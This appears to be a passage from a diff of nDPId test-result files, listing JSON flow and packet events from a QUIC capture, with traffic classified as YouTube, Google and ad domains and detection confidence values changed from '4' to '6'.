02317{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1621433567521,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433567521,"pkt":"AAAAAAAAAAEAS1QMCABFAAViYR1AAH4R+pqokEAFCUGp\/O4IAbsFTmqmwP8AAB0IrIdSuCmx8q8ANwCDdz03IhzUFn1L2Cnpzs\/TwSm2cofJpAX1JkTV3tCerbt47eBb\/tUYyv\/WG3oeaZXUGjSRmm5E\/S\/GHWDf3uofFcje7iOy\/NYB5qLognHXVD5g33k5Wi4OmgM+Ahmi4KhHeG3d2\/spKvCfjAjis75+5oGyetUb7SiO95JzfsedF3RaUE6Kj3rwNnMmnCLJJ1LfhDj1pFKjuI2YJh+71nHR\/BoSscicrqHnjNU+Kt5JysJR0+jE4LPT9l2mVbtuLkLis0xTseEMrQ66AbQ4UFQMzyqQWI6Ys9FFItz+0act2NE2Wbofw\/Lrumq\/k5f6prAdUO5v4cjZt\/R7aWcFen8a7KkWTJ\/7yg4CnjBGZeWmAF\/5X52U3x\/RCCkPoodlYLAoeE7zSZyzafp9Vs3xFNlJ9K08Ckfsw+JGyo11cIH+HtRX65c3vvT6RM+bJMwm4UScJkC6c7MPFESBou22UrxOHjl8NrD0kEu\/qLl4tdQbrTpkmURNF2JKrG1jx1\/Vfcu5uH+lsNbc4u2wpjBtpNr8b07\/1E6ftbBeGWLBOlfhvQxQUPiyD5FRgm3uDcodf1gX7fecwIzaijpGJiX6c2KBmWcNDAQ\/RbOf9+2e76hRJtul2\/BURpdz9zqqRcD4sx424KomOinx8opVJjXft4bXUEWmwuefm1\/MbxOXPv2RyHg9XMH3qoObK7PP8PiRDpbbi6LB0oS1AIUBop\/TsnEOwwab4fl60FNiCev7ICz8OTrnAs6or6No9QC4mHJiNDT\/A5vVLmzT+Z9Dqu6BSr\/JaA6a6DJxfKrQLEYyFN+mAQST11uNp+VnLp1My1clYT++rNpJ2L59DkZaHZMZObQn4ik6O5C5VTnjBEObmR92eddNMuyKx5Kcg3EUAmOCeW6r2JGIl\/IhqsZitb1a2D0s80k4oX7Mvtlc4SQUaT7Qoy9cxZgVr3MS2h5r3nBhDjmOzclfK29evsEafcbJ8vHLvuDQLmwUbuWeYZPoiyIhQ9vr3rKz\/vd4UPl9YGc+ZFcosYc4+tF2ZvXLoV44zl5Hn+JUXSAMG8rfoE5RFiZCNdNSnotUGTuB8Lo8zqSeIICZx9qwBhwg0RBlSWK21bfhv0V6bO9uXd+SDA46Wuo9rvFwnraBKcacSoVBqqZ6NGGOXQX3CZ0UnZskQ2Xh9lq7c+9mbhD+uHkgeQ59u9+pCOoymabTpJz40KiLhh8cpE9UupFG3Btt\/mF\/tKjiDmpak0XaH5p715g4CskmYYeD92tSYiV2pxtPeSRFzREp31JbFciPWTWGHAynBoYesEZ31n6hzAN8xZIjFGAvCt9mogpjeOLZJ7T6QB+DXmTonvgfoavnlxnuqRqgiv2cdSaHzS1VthMln+XrEc6vIeLHjdmGTvxC4AfsHPWXQIScQ1dgnB39QlH9QGb+UXoJzINdUC7cxDDD1xWXlxqErv9pLj\/8syL\/kpqf0cAEb9f64EjRsyus6nZBGadcNgi1Md7ZoW1HGHML8j\/VyYIyJ1h7a+uvD3tW2ObzdNNh76C4O7RQWUO8ZVim2RcdZDeVvKTfU9dvyIagWxbYngJIGWUFxc+bA6nkUtX80ozt8+iMKvMyzsIr5C1WAgFhm\/JX2pUDX72XRGljQ99hW8WgvHx1zqZrH1LJ+aVfz7ij\/XG14HFhuepiATRHhb90pWV4gDy4BiWtZbCYyogbxOy35IER+o2RQvYWxiFGjGpj26HCJi40rj7HUSLn3oSMIhCgp0XQZUgssWXFY06WovWc+\/OK\/KLsjtKK"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433567521,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1621433588411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433588411,"pkt":"AAAAAAAAAAEAz315CABFAAVi2sJAAH4Rh2SokEAFFgyWwuo9AbsFTrBryP8AAB0INSLhPL22UxQAAEU0dnb6uZhq1t6Zw3kr2pvHyfNWBxJD9W9s2zTRbPt+j3sYHVqGaibagTvObqxr8L7RMTtZH2xjRCWpCspX2XXuq+FXnTIfCwzq0R8bYQN7af9gvVLHPCvoe4LlWn1tEH6m0BTvrXq32km0YOpGp8mBDhiXp58UFczWic\/LDA0x6fF2n4YNtLE4Z2lMWFYhTTmuDLcKfFKATGaEQDjMewCgDLW4FqXB4m54SdcTcA\/dFOpbB1LCJ0YhH7hBJsrsRX7AF75ed76PrLag927ZRPEw3QiemYlDHW\/GgtF2bnMq6BMjp43+PZDDTs8Lw6sSJLk5j+j7binjYxfhzKvS9t5LIcp5cq8WQfdQfqbOCH+EpKFBTJXUATHM0GqFbPOFEWoTNdoLFZJCt0RlhQ2aFEhPRfofdgGmwmNcj6SQWX34PWjMe+xGvvQbWJbXfEiSpzsQw4qDOngUbAppNhq8yhTP7TLB+dKj0\/0j7CCnhGjf5VTlM4l8pSQLDnxJSczvPia0OmU+mYdzwvo0EOBr8AklCW7iLYW8dS2cmM0rlDa0ecqvTJ1VYOrB1S75Bz\/6V6+Hd7atab6h1vwSF2pFzXYcnqRiAinW\/VuSyg8KFFRr4Ybp5EzzwavSR2SInrndIzHlQgZhYkQhMHquBj5pApzCV3CuafdgWqruaCZexHIxHUdqmNN3yoqhpORch4AucgZXsQNNzu61Oune7H9O4MZHSTbLB19LCWWax1HzoFFeIyd+5XmDm8mqPBGBox1uxXAnJKM6+GXHpB2V+FVVww180yqLX4GanOJnfIFeIsn4XBJnYIAP18i9WhsbmRQWzl2XXYGFoRgkXkK1O+vGgPHV0EwDCUVaRhM2Rp+mvnnekeQws42lHMDRRxro+Eu9Ix0dsSJSRu5aFrroBpy3BPqsFCWb6M1EO0ZkiSuyMzMhMajOdUGCUna3gRiqvWtnMAbujUIPEq4PxN703lFKCAwIzIQNpwUh8mhLfFhAoyZhTjLup4KwhbKLFvYtKH0KHuLzpWQoBg9RYsqdtULI2+oQT2xHT99uhQc+dCK2nB0\/AJUbz91vXqq4Z+yTLK3qj+zNjQD0SHuOj18j+U37Pv7n6hwnuYzJKut5HNbT2mS5c\/00J82pn1UFjkHTJlZViBRbamRBCYCrX8FlJMJSeYHxtaGSD2LMbKIo8ecS2LrRVpGzwk0uo07Mlv9SeXRRtFhMhL8QJj7Ppv4crbwmWUJlFStoLO6iJRltLQK2Pl5JTkCISdw7ai8hmpPrQNR1gTuhnQ5\/GrIbz\/Hn59i+FyKiHMbjD3uzIGGIjeAdtBo03OGEL7XqBQA6NjJbG6W4THKFVaoUguo11P+g8z1hQF6OsY4EIS1M4hIImra0sUYy8Djc\/GGHsR0aEhjb1R4SiR+O9eiEtlxe1RT0g5rqIVSMhzdOU4wPWZDmrYaLl5hJ7phEqFGfgb6lrciOSZltZTNxTFq1zP4\/a6FEXS7CWMcJ7gX6XCBKUdUEBZvF6VAhczRd86bNCG2G0yjbnySI5sJBiFiizMdJaTuboXWehh73WfYET2wCS2TQ5Sg3Fpi\/2mK9dgxsZor0IxYLcaR+pvqa9krSP1h\/W+5Yc0W0Il09dN1RybZXko2cOc4Lfkq3Q0OvSfG5Ch6ZniiOz6DPWiFOkZUz2wi4NdBirItgeWcbhu2bR2McE74iWO9Bzd+fUd3fpaJcOg9NgCJg79T+rFXw2qinlYZGKvc14iIcpyM1OlOVLiWgsVNddHQTUfoocRRE+Quu"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-vh5ouxa-hju6.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433390651,"flow_last_seen":1621433390651,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433588411,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":58414,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1621433648984,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433648984,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+9FAAH4RFzaokEAFcfqJ8\/y1AbsFTvvUzP8AAB0IOGOQBfKCbj0ANwA\/voO+XXx9UNRzF\/PVLqUQmnVcfbJaFy+44m9Th\/J0D8vGDxgnE0b3my68fY4VhoH7ylldwCdE\/cIKBj8Q8msGVTF\/lZRPFcYyu4rQA4dMkmJLGh8h4hcVJXYlyXw0HxsVsRXBSCaH9pcz5MYJT0N8d\/QHoWIhJXtTq2A4a7329H7ZCy\/2hiheF\/XWiSc4pxmO9Ynh+JN2vvZnWdzm0q82\/5WdIhtH6DKNLW7\/XztT2A8BgoGu1165fwnnJttnCnp7MC7ceEZdqQcpJJ9S5BIzGJvI47OWUy\/O+A7cuxtRd80Baj5eUgykqLnUlMco5qWUXbGJ3qeG56zhiw2ILgjT7Bcuxpku4m9iswOoWD9e++B9OG3l4Nl0B6il9OgM9B6djMPEZaQ\/7P0eLCfrf8N1EK8IU+jTARRnjz11uoVbKvy1X354Ysm\/cfeR1fvYJ8g2GiyorZy5vRdiDqVcxw9hR+rNVIThkd9jHbU6NaUET2Zmcrhn0oU\/AQNeqrzoZrD0wkusdBqHE7Oy7ZP3iS2driLZ2Ic4Alz7LOyyp85qJ87V9cHDrhWW0V\/LheIEH23t7AEDMI2gPEDikZlOkiojcHtGj6V3+8VwA1VBAVbh6C2nQb7oWJn4psrNAUumMXN\/5bdg6Au5NE9nJBs2GYp2MzdKptvsKDmxm6J8MjGuWMQCrFOGnhGPYmsufDERoYla\/wIXOqNo8R\/FJFxzNp3PwXo7ZdrQ73XzNwHSr9ffXKXimX21O1SWpQHDR\/RbdX1vZUr3Lh7pfNbx6rH7OmcLXV99oY2AQ6e8oc11SSL+ZdlBq0HLriiqfnA7CcVCdmD6jwEIQhCXdiNp2REzSEls5BEEPv8qRmwUQhOspQKayIHnIFw4XLXOua7WKV89\/vWuyJiksgmRtispubeUmTZoRJOF5\/jnh38nkBft2hu59mNNnWRGPvIy19bc0cxeWlZ4oo6nA9PJSZrQOdeW\/rD5ea8+DflUeQgYwFBI1S1PmVVqn6wiLMuaN3KohpzaQ3XgqrMrhPL05TT+tnokrX8jZ67X0mBu4DfS\/lggH6sBExWEAFyohWoqxhN0lUtYWZxgsnjiG+zXzgkP9ZtYeUvbNuzU6A5q3kVffXh28T+8yra1UAY4vmoeH\/QjLFtQVcEqveGRLBBG1l5o0fUNpUtnBrmmkZGfWY8JzXpI0KnKiHip4fBG0IQd+Q2bQOSO\/Udo4tFpVnmlDgeOeYmyrnrCqgC0cHv\/XR5E73gV1kjRoXxPvXxp\/pzGER9dhbxukOJbOd+VrD3OKeWSvoGbaNv3kYyanEP88AWW\/Bf2lDp7\/uZ7ngQLGve59K09TJ\/VxfxlMpRy29Y9kICc+sz8POsOp1zPo8X3lv4KDjtiGPrF4cogmdW+gz\/1Rx8RTv8nIGkGcj+GVFdIFzhqjZlaM+tlw+V5CFsnIZ58RzZR6PY1G0cLuEeCNRKseDLy2xunVcw0reIDCM\/BTmBGYOUScCRjBtpioVUlizTJN63ofb24jOlXZTsMyrT5MJJU6Slp9jrbFIgBY+6oR5a2h\/33BA9ep\/j6lsrwpd8UjkvRh76vxWRquNFGDZEA\/nnCBtRlZ9XDeCRoVW5+pY+5AmH2BOq5S+1kF52Jn+8edM7qfDOmmPZCwuDrVPEFHpbn96ryrPI4Qt9pbBcq2Z69uLwP\/ZTNn2joerZUg8Hl4cFuZ6ooBq6byB92bCiYOv3FnN\/Mx0lMa5Ean6QjpWh6xfjOoz2RFyP71l9S1BlUPEZhl3HfYvAeLR1G"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433411827,"flow_last_seen":1621433411827,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":61341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433443702,"flow_last_seen":1621433443702,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433648984,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":56683,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1621433848159,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433848159,"pkt":"AAAAAAAAAAEAguyCCABFAAViV7ZAAH4RzIyokEAFdZR1HukgAbsFTrrGzv8AAB0IZrtHVazP7GUANwCdzwl\/Ag4dMP\/532YmgteM9y4rfgnxKHdwAMQTxGHIHdDGRBEdHlnPsFRQLnkLCUyj+ZiMcQtE\/ZbnAwVVwgmAbJeZzFu0xe9BjJU+0q0ZPjc4pl\/q1xAOsn94uZ6J3jN9QX92abvAtxhYz8VeBqrOA607zbwY9GWSP6ok9Pja\/Fq8w8NDCZGf3qIL3rk\/wAzA3jEYpRRQWDHceKbIR88KOcO1FL8LDN9LJGuLhgF5FQs6DJLnrpIczBSYq4OBwz\/\/sKd1SAUQJMcAmfR\/jZPeYBnpsWTjRALFzwpImgbStENOm\/0p3NLhVUB6WCiKCvKKk9gT6\/d\/x10ux08ULPTBXIv\/k4Ll8l6sgA2ueorwPBTauFi21MhZZCtPcV3eJ6EUWMMMFrZfATCNoB+EVA44T4fDxdcOZEzFwjnKteEZmVkDbqqZ9qjV5YV3p\/6BGB2jz47XkvU4EacBYHhxZ2ZBLwV2tLuqe7+aE8IdEygSC4TSRNL49Ttq\/RQwV8aObYvXamg93UAuYbgkXDq6Cz0FVo2RyS4gV5roXuZXS44vxfS1oZOfTTNFzIHJUGwN9JEwtlJyaLE+zlmDRVeeKLag0ryJrnplqRANQHZqgBEbDtwGPSRu34eTOgLm4WHJcagJTF4Fz7xu6\/\/DDYatKPQYRG7oY7IYZQm7mhylJ7uBUzlcqBwaflcUNmXybTxJ+2WD0zZz6gCJLVhgwyhutJAlQanGkuwf3EdmqBx8ceqxoNJ7tZKAGK6ZLIa3G6I1xZC\/TaQ+1KZfZAfI4pB3hAXWDjm2gcWEJXPdl2HpQhbj4SN3C\/MogkQ6jmjo2la2vWjIQ2+qzYSkHj832CLT58yzA0tGXZvR5lpaU6hPOvYp9D+DMoC0H2it5Bi\/rirv+bbZpE7LzsCnG1SyGV0J0MpJPpexlnfbb0tXuruzppFFVv8XX\/\/AGNTxslc2JJDce0W3BO9U2F7QbGNMDxkz\/wBWOEZH8+aF8yWPCo26iB0IWKm64gR8orVp9wCN\/S\/ux5zHmhkRNoUehIoFt23QRRYl4mEM8Kb+yNY6ExrRhuVVLVK07imb+PWqHfegN+A6yiJIol96tI\/qRwPHidTWuw+BPOds5nSGwNNMYCpCNYS7znyftMnQYiHdYUMEr1nkXG0p+BTVDr6yzplTCLHGEroPKNnH8e3DVvViJ3UCgrkqYMJFZa415l4iDMaX1IPVcIVbn0GJt+fxcZSe\/4EBL\/Lglqu4lLqW8vfP3Ryp18CcBI5AUvjnbHT3H9GKw1At8VX0EmM6FNbrzmSDDHpjxJAjZFsnjcKA4s8cGEzjtd04U5Ov1l\/uV+TrsjbEVaYIN3cAlR8CmLid56lf832bUt\/rJVHoQNMALy35MqNi3UTMRHx2sOalpm1X2yqB6Qcr8RiPpnVvJ0XaoyVa69ClIE\/D0J\/eeWPqDxqyOq2dFObeT\/Q3Ey6oum6f7LqZWXPfk\/Of0coJY79h0DaTGeZt8KNREQgsRBcylskDOu5tf2QjszGuOPnHGGIjoEkML3giU2HtWNdhUpR6kCeVzhBvo+CYlsFw0XUh5F8NiKLotZ\/peNJe9m5PV26VmA1CuJnJUZ+iTsXmSUkD0eRX0gnwfjJ6dq\/oMKsvWsVcGcwOkeW0MrEVdWGsBJjfzNjkVIa433oGL9UgwBMpD4PWzwUd+SNd+1vgvOeW4tFbxfn\/XBNWVoFAyPSzEwkXy++b+c1GHJidlATTQULFM1qwYz4DqrTvS\/tKosbIdtvCa5V\/Wk2K\/pjchLwN"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; 